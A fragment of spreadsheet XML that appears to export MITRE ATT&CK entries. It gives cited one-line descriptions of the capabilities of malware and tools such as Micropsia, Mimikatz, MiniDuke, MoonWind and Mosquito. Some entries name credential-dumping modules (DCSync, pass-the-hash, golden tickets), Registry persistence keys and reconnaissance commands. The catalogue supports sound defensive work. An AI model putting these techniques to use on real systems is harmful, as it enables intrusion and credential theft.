    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used VBS code on victims’ systems.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used HTTP for downloading items.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute files.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a RAR archive based on collected files on the victim's machine.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform microphone recording.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a new hidden directory to store all components' outputs in a dedicated sub-folder for each.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) can download and execute an executable from the C2 server.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) has keylogging capabilities.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) obfuscates the configuration with a custom Base64 and XOR.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) takes screenshots every 90 seconds by calling the Gdi32.BitBlt API.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) searches for anti-virus software and firewall products installed on the victim’s machine using WMI.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a shortcut to maintain persistence.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) gathers the hostname and OS version from the victim’s machine.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) collects the username from the victim’s machine.(Citation: Talos Micropsia June 2017)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) uses HTTP and HTTPS for C2 network communications.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[Micropsia](https://attack.mitre.org/software/S0339) creates a command-line shell using cmd.exe.(Citation: Radware Micropsia July 2018)</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) can dump process memory and extract clear-text credentials.(Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The &lt;code&gt;LSADUMP::ChangeNTLM&lt;/code&gt; and &lt;code&gt;LSADUMP::SetNTLM&lt;/code&gt; modules can also manipulate the password hash of an account without knowing the clear text value.(Citation: Adsecurity Mimikatz Guide)(Citation: Metcalf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</si>
  <si>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credential vault and DPAPI.(Citation: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</si>
  <si>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DPAPI.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>DCSync</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</si>
  <si>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DCSync/NetSync.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create golden tickets.(Citation: GitHub Mimikatz kerberos Module)</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</si>
  <si>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LSA.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</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</si>
  <si>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LSASS Memory.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;SEKURLSA::Pth&lt;/code&gt; module can impersonate a user, with only a password hash, to execute arbitrary commands.(Citation: Adsecurity Mimikatz Guide)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCSync&lt;/code&gt; and &lt;code&gt;KERBEROS::PTT&lt;/code&gt; modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)(Citation: Harmj0y DCSync Sept 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;CRYPTO::Extract&lt;/code&gt; module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCShadow&lt;/code&gt; module can be used to make AD updates by temporarily setting a computer to be a DC.(Citation: Deply Mimikatz)(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;MISC::AddSid&lt;/code&gt; module can appended any SID or user/group account to a user's SID-History. [Mimikatz](https://attack.mitre.org/software/S0002) also utilizes [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.(Citation: Adsecurity Mimikatz Guide)(Citation: AdSecurity Kerberos GT Aug 2015)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.(Citation: Deply Mimikatz)(Citation: GitHub Mimikatz lsadump Module)(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper contains an implementation of an SSP.(Citation: Deply Mimikatz)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create silver tickets.(Citation: GitHub Mimikatz kerberos Module)</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) contains functionality to acquire credentials from the Windows Credential Manager.(Citation: Delpy Mimikatz Crendential Manager)</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.(Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can create a process on a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>Some [MiniDuke](https://attack.mitre.org/software/S0051) components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.(Citation: F-Secure The Dukes)(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use DGA to generate new Twitter URLs for C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.(Citation: Securelist MiniDuke Feb 2013)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can enumerate local drives.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can download additional encrypted backdoors onto the victim via GIF files.(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use control flow flattening to obscure code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can gather the hostname on a compromised machine.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is likely loaded via DLL hijacking into a legitimate McAfee binary.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has a function for decrypting data containing C2 configuration information.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can collect CPU and architecture information from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can gather the username from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has the capability to execute commands using cmd.exe.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) first attempts to use a Base64-encoded network protocol over a raw TCP socket for C2, and if that method fails, falls back to a secondary HTTP-based protocol to communicate to an alternate C2 server.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c net user {Username}&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a temporary user on the system named “Lost_{Unique Identifier}.”(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [Mis-Type](https://attack.mitre.org/software/S0084) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c ipconfig /all&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) runs tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over HTTP.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) uses cmd.exe to run commands for enumerating the host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting the backdoor file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting Registry keys used for persistence.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of downloading files from the C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic communicates over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic is Base64-encoded plaintext.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>The initial beacon packet for [Misdat](https://attack.mitre.org/software/S0083) contains the operating system version of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>Many [Misdat](https://attack.mitre.org/software/S0083) samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of providing shell functionality to the attacker to execute commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to download and execute .exe files.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) creates the following Registry entry: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia&lt;/code&gt;.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to gather NTLM password information.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to open a remote shell and run basic commands.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim browser bookmarks.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data collected from the victim mobile device.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to download a file from the C2 server to the victim mobile device's SD card.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload information about all running processes to its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can download additional payloads from the C2.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can use PowerShell to set persistence.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can achieve persitence on the infected machine by setting the Registry run key.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can use WMI commands to check the system for firewall and antivirus software.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can collect information about the about the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can execute commands via the command line utility.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can perform WMI commands on the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can delete itself or specified files.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a directory listing for a specified directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a keylogger.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) saves information from its keylogging routine as a .zip file in the present working directory.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) completes network communication via raw sockets.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the number of removable drives from the victim.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) has a command to return a list of running processes.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) encrypts C2 traffic using RC4 with a static key.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim IP address.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim username.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) obtains the victim's current time.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) can execute commands via an interactive command shell.(Citation: Palo Alto MoonWind March 2017) [MoonWind](https://attack.mitre.org/software/S0149) uses batch scripts for various purposes, including to restart and uninstall itself.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.(Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) will decode malware components that are then dropped to the system.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can remove itself from a system.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can download and launch additional payloads.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used HTTP GET requests to check internet connectivity.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284)'s payload has been encrypted with a key that has the hostname and processor family information appended to the end.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used regsvr32.exe to execute the malicious DLL.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) can obtain information on installed anti-malware programs.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used basE91 encoding, along with encryption, for C2 communication.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used an RC4-based encryption method for its C2 communications.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the OS version and computer name.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the IP address from the victim's machine.(Citation: Talos Cobalt Group July 2018)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the username from the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) uses HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used cmd.exe for execution.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses COM hijacking as a method of persistence.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) deletes files using DeleteFileW API call.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can upload and download files to the victim.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) stores configuration values under the Registry key &lt;code&gt;HKCU\Software\Microsoft\[dllname]&lt;/code&gt; and modifies Registry keys under &lt;code&gt;HKCR\CLSID\...\InprocServer32&lt;/code&gt;with a path to the launcher.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) leverages the CreateProcess() and LoadLibrary() calls to execute files with the .dll and .exe extensions.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)’s installer is obfuscated with a custom crypter to obfuscate the installer.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can launch PowerShell Scripts.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;tasklist&lt;/code&gt; to obtain running processes.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) establishes persistence under the Registry key &lt;code&gt;HKCU\Software\Run auto_update&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer searches the Registry and system to see if specific antivirus tools are installed on the system.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer uses WMI to search for antivirus display names.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can be used to scan IP networks.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can dump and print whole packet content.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can list NetBIOS computer names.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can be used to collect MAC addresses.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can list active users on the system.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can obtain a list of all files and directories as well as logical drives.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can download and execute a file from given URL.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) uses AES to encrypt certain information sent over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim computer name and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim username and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Adversaries can also use [NETEAGLE](https://attack.mitre.org/software/S0034) to establish an RDP connection with a controller over TCP/7519.</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is capable of reading files over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will attempt to detect if the infected host is configured to a proxy. If so, [NETEAGLE](https://attack.mitre.org/software/S0034) will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>If [NETEAGLE](https://attack.mitre.org/software/S0034) does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, [NETEAGLE](https://attack.mitre.org/software/S0034) will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can send process listings over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>The "SCOUT" variant of [NETEAGLE](https://attack.mitre.org/software/S0034) achieves persistence by adding itself to the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will decrypt resources it downloads with HTTP requests by using RC4 with the key "ScoutEagle."(Citation: FireEye APT30)</t>
  </si>
  <si>
